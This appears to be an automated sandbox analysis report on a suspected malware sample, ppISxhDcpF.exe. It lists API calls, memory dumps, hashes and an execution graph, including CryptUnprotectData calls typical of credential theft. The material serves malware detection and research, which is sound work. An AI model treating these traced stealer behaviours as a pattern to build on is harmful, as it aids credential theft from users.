                                                                                                                • Associated: 00000000.00000002.1990457155.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990496635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990626450.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseCreateHandleProcess
                                                                                                                • String ID: Error launching installer
                                                                                                                • API String ID: 3712363035-66219284
                                                                                                                • Opcode ID: d9d25ead1e61dd1de32296c4779b051624e3cc0dc0aa34a2348a33ced0ef8ad4
                                                                                                                • Instruction ID: 39588cd766b2ea89d65183b6a6bcc828c6470883592abd44c37ede1670716c40
                                                                                                                • Opcode Fuzzy Hash: d9d25ead1e61dd1de32296c4779b051624e3cc0dc0aa34a2348a33ced0ef8ad4
                                                                                                                • Instruction Fuzzy Hash: B8E0B6B4600209BFEB109B64ED49F7B7AADEB04708F004665BD50F6191DB74EC158B78
                                                                                                                APIs
                                                                                                                • FreeLibrary.KERNEL32(?,75573420,00000000,C:\Users\user\AppData\Local\Temp\,004037E1,004035F6,?), ref: 00403823
                                                                                                                • GlobalFree.KERNEL32(?), ref: 0040382A
                                                                                                                Strings
                                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00403809
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1990472937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1990457155.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990496635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990626450.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Free$GlobalLibrary
                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                • API String ID: 1100898210-4083868402
                                                                                                                • Opcode ID: 5898abf10019027861f76b75f8a0bd4982bc330ca6c5028dc7fe5a6e65d5b297
                                                                                                                • Instruction ID: 1a021970d57ae41c51ef9a97853206db199f5c9852ffd88fd16926185a7b9e14
                                                                                                                • Opcode Fuzzy Hash: 5898abf10019027861f76b75f8a0bd4982bc330ca6c5028dc7fe5a6e65d5b297
                                                                                                                • Instruction Fuzzy Hash: 72E0EC3350162097C7216F55BD08B6AB7ACAF4DB22F4584BAE880BB2608B745C428BD8
                                                                                                                APIs
                                                                                                                • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402E5A,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\ppISxhDcpF.exe,C:\Users\user\Desktop\ppISxhDcpF.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405A5B
                                                                                                                • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E5A,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\ppISxhDcpF.exe,C:\Users\user\Desktop\ppISxhDcpF.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405A6B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1990472937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1990457155.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990496635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990626450.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CharPrevlstrlen
                                                                                                                • String ID: C:\Users\user\Desktop
                                                                                                                • API String ID: 2709904686-1876063424
                                                                                                                • Opcode ID: 2f3bd6b78df313aedfed625dab12a62b748c0839e8540faa9dae91e8a46bacba
                                                                                                                • Instruction ID: bc07cd37d8a58f62a2b9a6dad95115890aa924a9f687d43278fd1307a4d4e217
                                                                                                                • Opcode Fuzzy Hash: 2f3bd6b78df313aedfed625dab12a62b748c0839e8540faa9dae91e8a46bacba
                                                                                                                • Instruction Fuzzy Hash: 7ED05EB2400D209AD312A714DC84DAF77ACEF1530074A446BF441A31A0D7785D918AA9
                                                                                                                APIs
                                                                                                                • GlobalAlloc.KERNEL32(?,?), ref: 1000116A
                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 100011C7
                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 100011D9
                                                                                                                • GlobalFree.KERNEL32(?), ref: 10001203
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2008032542.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2008007393.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2008088602.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2008146266.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_10000000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Global$Free$Alloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 1780285237-0
                                                                                                                • Opcode ID: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                                                                                • Instruction ID: f345eba8489605592ce73ef35c78e6b42925bf5f5eceaf1f60f0973e38c56604
                                                                                                                • Opcode Fuzzy Hash: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                                                                                • Instruction Fuzzy Hash: AE318FF6904211DBF314CF64DC859EA77E8EB853D0B12452AFB45E726CEB34E8018765
                                                                                                                APIs
                                                                                                                • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9F
                                                                                                                • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405BB7
                                                                                                                • CharNextA.USER32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BC8
                                                                                                                • lstrlenA.KERNEL32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BD1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1990472937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1990457155.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990496635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990626450.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                • String ID:
                                                                                                                • API String ID: 190613189-0
                                                                                                                • Opcode ID: c22d3165051237620b2fbf365f01d50e367ccce7d83d9982a11a9c9d857fbe9e
                                                                                                                • Instruction ID: ee410971918da6c20df7c5ac797640abd601cb5b02c8e88895b13af08820b85c
                                                                                                                • Opcode Fuzzy Hash: c22d3165051237620b2fbf365f01d50e367ccce7d83d9982a11a9c9d857fbe9e
                                                                                                                • Instruction Fuzzy Hash: 22F06231104958AFC7029BA5DD4099FBBB8EF55254B2540A9E840F7211D674FE019BA9

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:11.1%
                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                Signature Coverage:2.3%
                                                                                                                Total number of Nodes:258
                                                                                                                Total number of Limit Nodes:17
                                                                                                                execution_graph 39445 15af90 39446 15b0e2 39445->39446 39447 15afa9 39445->39447 39447->39446 39456 38010190 39447->39456 39460 38010198 39447->39460 39448 15b1a3 39464 384bbd48 39448->39464 39457 380101a4 39456->39457 39480 3801c638 39457->39480 39458 380101da 39458->39448 39461 380101a4 39460->39461 39463 3801c638 CryptUnprotectData 39461->39463 39462 380101da 39462->39448 39463->39462 39465 384bbd54 39464->39465 39504 384bbda8 39465->39504 39468 389e2729 39469 389e273f 39468->39469 39563 389e0938 39469->39563 39474 389e2730 39475 389e273f 39474->39475 39476 389e0938 10 API calls 39475->39476 39477 389e2746 39476->39477 39478 389e188c 14 API calls 39477->39478 39479 15b1b1 39478->39479 39482 3801c66a 39480->39482 39481 3801caf9 39481->39458 39482->39481 39484 3801cf01 39482->39484 39485 3801cf10 39484->39485 39488 3801d57f 39485->39488 39489 3801d59b 39488->39489 39493 3801d7a0 39489->39493 39497 3801d798 39489->39497 39490 3801d629 39494 3801d7bd 39493->39494 39501 3801d1ec 39494->39501 39498 3801d7bd 39497->39498 39499 3801d1ec CryptUnprotectData 39498->39499 39500 3801d7f5 39499->39500 39500->39490 39502 3801d9e0 CryptUnprotectData 39501->39502 39503 3801d7f5 39502->39503 39503->39490 39505 384bbdb4 39504->39505 39509 384bce50 39505->39509 39513 384bce60 39505->39513 39506 15b1aa 39506->39468 39506->39474 39510 384bce7c 39509->39510 39517 384b94b4 39510->39517 39512 384bce9b 39512->39506 39514 384bce7c 39513->39514 39515 384b94b4 CreateWindowExW 39514->39515 39516 384bce9b 39515->39516 39516->39506 39518 384b94bf 39517->39518 39519 384bcf4f 39518->39519 39522 384bcf39 39518->39522 39530 384bcf68 39518->39530 39519->39512 39523 384bcf3f 39522->39523 39524 384bcf57 39522->39524 39527 384bcf39 CreateWindowExW 39523->39527 39528 384bcf68 CreateWindowExW 39523->39528 39529 384bcf4f 39523->39529 39526 384bd021 39524->39526 39534 384b95e8 39524->39534 39527->39529 39528->39529 39529->39519 39532 384bcf7f 39530->39532 39531 384bd021 39532->39531 39533 384b95e8 CreateWindowExW 39532->39533 39533->39531 39536 384b95f3 39534->39536 39535 384bec47 39535->39526 39536->39535 39538 384be7f4 39536->39538 39540 384be7ff 39538->39540 39539 384bf111 39539->39535 39540->39539 39543 384bfaa1 39540->39543 39548 384bfab0 39540->39548 39544 384bfab0 39543->39544 39545 384bfb8a 39544->39545 39553 389e00b7 39544->39553 39557 389e00c0 39544->39557 39549 384bfadb 39548->39549 39550 384bfb8a 39549->39550 39551 389e00b7 CreateWindowExW 39549->39551 39552 389e00c0 CreateWindowExW 39549->39552 39551->39550 39552->39550 39554 389e00c0 39553->39554 39560 389e01c8 39554->39560 39559 389e01c8 CreateWindowExW 39557->39559 39558 389e00f5 39558->39545 39559->39558 39561 389e01d3 CreateWindowExW 39560->39561 39562 389e0234 39561->39562 39564 389e0948 39563->39564 39565 389e0965 39564->39565 39572 389e0978 39564->39572 39584 389e0980 39564->39584 39568 389e188c 39565->39568 39570 389e1897 39568->39570 39571 389e2866 39570->39571 39606 389e1934 39570->39606 39573 389e09c6 GetCurrentProcess 39572->39573 39575 389e0a18 GetCurrentThread 39573->39575 39576 389e0a11 39573->39576 39577 389e0a4e 39575->39577 39578 389e0a55 GetCurrentProcess 39575->39578 39576->39575 39577->39578 39579 389e0a8b 39578->39579 39596 389e0f39 39579->39596 39598 389e0b57 39579->39598 39580 389e0ab3 GetCurrentThreadId 39581 389e0ae4 39580->39581 39581->39565 39585 389e09c6 GetCurrentProcess 39584->39585 39587 389e0a18 GetCurrentThread 39585->39587 39588 389e0a11 39585->39588 39589 389e0a4e 39587->39589 39590 389e0a55 GetCurrentProcess 39587->39590 39588->39587 39589->39590 39591 389e0a8b 39590->39591 39594 389e0f39 39591->39594 39595 389e0b57 2 API calls 39591->39595 39592 389e0ab3 GetCurrentThreadId 39593 389e0ae4 39592->39593 39593->39565 39594->39592 39595->39592 39597 389e0f4e 39596->39597 39597->39580 39602 389e0bc8 DuplicateHandle 39598->39602 39604 389e0bc0 DuplicateHandle 39598->39604 39599 389e0b8e 39599->39580 39603 389e0c5e 39602->39603 39603->39599 39605 389e0c5e 39604->39605 39605->39599 39611 389e193f 39606->39611 39607 389e2e79 39608 389e2ea9 39607->39608 39609 389e2ac4 11 API calls 39607->39609 39613 389e2ed4 39608->39613 39622 389e2ac4 39608->39622 39609->39608 39611->39607 39611->39613 39617 389e3e40 39611->39617 39612 389e2ec1 39612->39613 39628 389ed5f8 39612->39628 39635 389ed608 39612->39635 39613->39570 39619 389e3e61 39617->39619 39618 389e3e85 39618->39607 39619->39618 39642 389e3fe7 39619->39642 39648 389e3ff0 39619->39648 39623 389e2acf 39622->39623 39624 389ed0a1 39623->39624 39625 389e0938 10 API calls 39623->39625 39624->39612 39626 389ed0bb 39625->39626 39674 389ec544 39626->39674 39634 389ed66d 39628->39634 39629 389ec5c0 LdrInitializeThunk 39629->39634 39630 389ed899 39631 389e0938 10 API calls 39630->39631 39632 389ed6ba 39631->39632 39632->39613 39634->39629 39634->39630 39634->39632 39681 389ec60c 39634->39681 39639 389ed66d 39635->39639 39636 389ec5c0 LdrInitializeThunk 39636->39639 39637 389ed899 39638 389e0938 10 API calls 39637->39638 39640 389ed6ba 39638->39640 39639->39636 39639->39637 39639->39640 39641 389ec60c DispatchMessageW 39639->39641 39640->39613 39641->39639 39643 389e3ffd 39642->39643 39644 389e0938 10 API calls 39643->39644 39645 389e402b 39644->39645 39646 389e4036 39645->39646 39654 389e2bec 39645->39654 39646->39618 39650 389e3ffd 39648->39650 39649 389e0938 10 API calls 39651 389e402b 39649->39651 39650->39649 39652 389e4036 39651->39652 39653 389e2bec 11 API calls 39651->39653 39652->39618 39653->39652 39655 389e2bf7 39654->39655 39657 389e40a8 39655->39657 39658 389e2c20 39655->39658 39657->39657 39659 389e2c2b 39658->39659 39664 389e2c30 39659->39664 39661 389e4517 39668 389e921c 39661->39668 39667 389e2c3b 39664->39667 39665 389e57a0 39665->39661 39666 389e3e40 11 API calls 39666->39665 39667->39665 39667->39666 39669 389e4551 39668->39669 39670 389e9235 39668->39670 39669->39657 39672 384bfaa1 CreateWindowExW 39670->39672 39673 384bfab0 CreateWindowExW 39670->39673 39671 389e9321 39672->39671 39673->39671 39676 389ec54f 39674->39676 39675 389ed3bb 39675->39624 39676->39675 39678 389ec560 39676->39678 39679 389ed3f0 OleInitialize 39678->39679 39680 389ed454 39679->39680 39680->39675 39682 389ee6d0 DispatchMessageW 39681->39682 39683 389ee73c 39682->39683 39683->39634 39684 389e02c8 39685 389e02ee 39684->39685 39689 389e1bd0 39685->39689 39696 389e1bc0 39685->39696 39690 389e1bfd 39689->39690 39691 389e1c2f 39690->39691 39703 389e1d58 39690->39703 39713 389e9b40 39690->39713 39718 389e1d50 39690->39718 39728 389e9b48 39690->39728 39697 389e1bd0 39696->39697 39698 389e1c2f 39697->39698 39699 389e1d58 3 API calls 39697->39699 39700 389e9b48 2 API calls 39697->39700 39701 389e1d50 3 API calls 39697->39701 39702 389e9b40 2 API calls 39697->39702 39699->39698 39700->39698 39701->39698 39702->39698 39704 389e1d66 39703->39704 39705 389e1d93 39703->39705 39708 389e1d6e 39704->39708 39737 389e1db9 39704->39737 39741 389e1dc0 39704->39741 39705->39704 39706 389e1d98 39705->39706 39733 389e17d0 39706->39733 39708->39691 39709 389e1da4 39709->39691 39710 389e1dac 39710->39691 39714 389e9b5c 39713->39714 39749 389e9bf7 39714->39749 39752 389e9c00 39714->39752 39715 389e9be8 39715->39691 39719 389e1d58 39718->39719 39720 389e1d66 39719->39720 39722 389e1d98 39719->39722 39721 389e1d6e 39720->39721 39726 389e1db9 CallWindowProcW 39720->39726 39727 389e1dc0 CallWindowProcW 39720->39727 39721->39691 39723 389e17d0 GetCurrentThreadId 39722->39723 39724 389e1da4 39723->39724 39724->39691 39725 389e1dac 39725->39691 39726->39725 39727->39725 39730 389e9b5c 39728->39730 39729 389e9be8 39729->39691 39731 389e9bf7 2 API calls 39730->39731 39732 389e9c00 2 API calls 39730->39732 39731->39729 39732->39729 39734 389e17db 39733->39734 39745 389e181c 39734->39745 39736 389e22f5 39736->39709 39738 389e1dc0 39737->39738 39739 389e1e5a CallWindowProcW 39738->39739 39740 389e1e09 39738->39740 39739->39740 39740->39710 39742 389e1e02 39741->39742 39744 389e1e09 39741->39744 39743 389e1e5a CallWindowProcW 39742->39743 39742->39744 39743->39744 39744->39710 39746 389e1827 39745->39746 39747 389e2461 GetCurrentThreadId 39746->39747 39748 389e248b 39746->39748 39747->39748 39748->39736 39750 389e9c11 39749->39750 39755 389eb047 39749->39755 39750->39715 39753 389e9c11 39752->39753 39754 389eb047 2 API calls 39752->39754 39753->39715 39754->39753 39757 389e1db9 CallWindowProcW 39755->39757 39758 389e1dc0 CallWindowProcW 39755->39758 39756 389eb05a 39756->39750 39757->39756 39758->39756 39759 389e20c0 39762 389e20ed 39759->39762 39760 389e213c 39760->39760 39762->39760 39763 389e17fc 39762->39763 39764 389e1807 39763->39764 39765 389e17d0 GetCurrentThreadId 39764->39765 39766 389e229c 39765->39766 39768 384b95e8 CreateWindowExW 39766->39768 39770 384bec22 39766->39770 39767 389e22a5 39767->39760 39768->39767 39771 384bec3a 39770->39771 39773 384bec47 39770->39773 39772 384be7f4 CreateWindowExW 39771->39772 39771->39773 39772->39773 39773->39767 39774 389e2020 SetTimer 39775 389e208c 39774->39775

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1217 3801d9d9-3801d9de 1218 3801d9e0-3801da52 CryptUnprotectData 1217->1218 1219 3801da54-3801da5a 1218->1219 1220 3801da5b-3801da83 1218->1220 1219->1220
                                                                                                                APIs
                                                                                                                • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 3801DA45
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2736836506.0000000038010000.00000040.00000800.00020000.00000000.sdmp, Offset: 38010000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_38010000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CryptDataUnprotect
                                                                                                                • String ID:
                                                                                                                • API String ID: 834300711-0
                                                                                                                • Opcode ID: c305990692b9587187614bbde53a7c423a58133da3b904e56811a472b109e5ce
                                                                                                                • Instruction ID: 80ea2231df3cb7c9baed9331f61220533906b7ffce293ba4ade6fd3594246baa
                                                                                                                • Opcode Fuzzy Hash: c305990692b9587187614bbde53a7c423a58133da3b904e56811a472b109e5ce
                                                                                                                • Instruction Fuzzy Hash: 041197B6800249DFDB10CF99D840BDEBFF5EF88320F148419E954A3210C339A550CFA1

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1223 3801d1ec-3801da52 CryptUnprotectData 1225 3801da54-3801da5a 1223->1225 1226 3801da5b-3801da83 1223->1226 1225->1226
                                                                                                                APIs
                                                                                                                • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 3801DA45
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2736836506.0000000038010000.00000040.00000800.00020000.00000000.sdmp, Offset: 38010000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_38010000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CryptDataUnprotect
                                                                                                                • String ID:
                                                                                                                • API String ID: 834300711-0
                                                                                                                • Opcode ID: cfa2c4bf3b2149d1df6f24de66a1f98e71475057fba811dfd6bebedfaaeed5b3
                                                                                                                • Instruction ID: 334227666377779edb4cf6f60b9d4021cbaccd9344038be32dded7586f2494f4
                                                                                                                • Opcode Fuzzy Hash: cfa2c4bf3b2149d1df6f24de66a1f98e71475057fba811dfd6bebedfaaeed5b3
                                                                                                                • Instruction Fuzzy Hash: 791144768003499FDB10DF99C845BDEBFF5EB88320F148459EA18A7210C779A950DFA5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2709257271.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_150000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: d4a03a1ce6575c8a3c487cea69b687d846302a505e2a9cd34d145a5e53761d83
                                                                                                                • Instruction ID: b46799f2457e6e5b14475ee5e523a50ff6c7846cc0f9203e427d7f70b15a6647
                                                                                                                • Opcode Fuzzy Hash: d4a03a1ce6575c8a3c487cea69b687d846302a505e2a9cd34d145a5e53761d83
                                                                                                                • Instruction Fuzzy Hash: BE926E70A04209DFCB15CF68C984AAEBBB2FF88311F158559E825DF2A1D731ED49CB61
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2737352485.00000000389E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 389E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_389e0000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 2453ee488233dab43f65c1f732820ece2546371899095396b91cacd0bdddaf4f
                                                                                                                • Instruction ID: 083c3331a7b42923aef81acecab17ca5eb050da8cb11dd7b22f74d594fc60e7a
                                                                                                                • Opcode Fuzzy Hash: 2453ee488233dab43f65c1f732820ece2546371899095396b91cacd0bdddaf4f
                                                                                                                • Instruction Fuzzy Hash: 3282B374A00228DFDB25DF64C894B99BBB2FB89301F5081E9D90AB7354DB31AE81DF50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2737135912.00000000384B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_384b0000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: c4f3c91d507417846a89180c4da1c69fefcbf1e40b82e549e6d5c5fc5eb334ea
                                                                                                                • Instruction ID: f810f382b5bd8d2ea4d4a2032311ea7e10802d199002578b6fab62f2d1c6f25c
                                                                                                                • Opcode Fuzzy Hash: c4f3c91d507417846a89180c4da1c69fefcbf1e40b82e549e6d5c5fc5eb334ea
                                                                                                                • Instruction Fuzzy Hash: 6E72D374A01218DFDB25DF64C994B99BBB2FB89301F5081E9D90AB7354CB31AE82DF50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2737135912.00000000384B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_384b0000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: ffa22b61abce6a1194b30322b0244b21af498fe6186a805f2ec30420b8568c5e
                                                                                                                • Instruction ID: 321225f8559e85e991e4a76f6b25f4edb0929364d15f9eed9b11129ff1d46ae1
                                                                                                                • Opcode Fuzzy Hash: ffa22b61abce6a1194b30322b0244b21af498fe6186a805f2ec30420b8568c5e
                                                                                                                • Instruction Fuzzy Hash: 6772AD74E01228CFEB65DF69C980BD9BBB2BB49340F5481E9D849A7351DB349E82CF50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2709257271.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_150000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 3833ee8bf7505778412f9f0e421fcd6a0169f545e0206c3df77805f1cde0f11c
                                                                                                                • Instruction ID: fbd3989c2f1d4d3e4caa58ff74b8f2beefdeb95107142b2100a742a6c1c22636
                                                                                                                • Opcode Fuzzy Hash: 3833ee8bf7505778412f9f0e421fcd6a0169f545e0206c3df77805f1cde0f11c
                                                                                                                • Instruction Fuzzy Hash: 05226C70A00219DFDB18DFA5C854BAEBBB6FF88301F108529E916DB291DB349D45DB90
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2709257271.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_150000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: ba7fa65391791b16d6e913b2d8b2c426e7aa3cdef2a3c8ff4d5df129dc12ceba
                                                                                                                • Instruction ID: 4d51c60744d26c4502230723a96c3687ab722b0c242891d9146360b01dd901c2
                                                                                                                • Opcode Fuzzy Hash: ba7fa65391791b16d6e913b2d8b2c426e7aa3cdef2a3c8ff4d5df129dc12ceba
                                                                                                                • Instruction Fuzzy Hash: 8ED14070A00119DFCB54CFA9C984AADBBB2FF98316F958055E825EF261DB30DD85CB90
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2736836506.0000000038010000.00000040.00000800.00020000.00000000.sdmp, Offset: 38010000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_38010000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 644bf9829163b196afe010b03a6d56d4ba65a96615a5114c223f78a2bb2d9a52
                                                                                                                • Instruction ID: 4830b30688caa356348eafbede0610859104683da43011b23fa92cd21e35caa5
                                                                                                                • Opcode Fuzzy Hash: 644bf9829163b196afe010b03a6d56d4ba65a96615a5114c223f78a2bb2d9a52
                                                                                                                • Instruction Fuzzy Hash: C4E1C178E01218CFEB14CFA5C954B9DBBB2BF89304F6081A9D809B7391DB359A85CF50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2736836506.0000000038010000.00000040.00000800.00020000.00000000.sdmp, Offset: 38010000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_38010000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
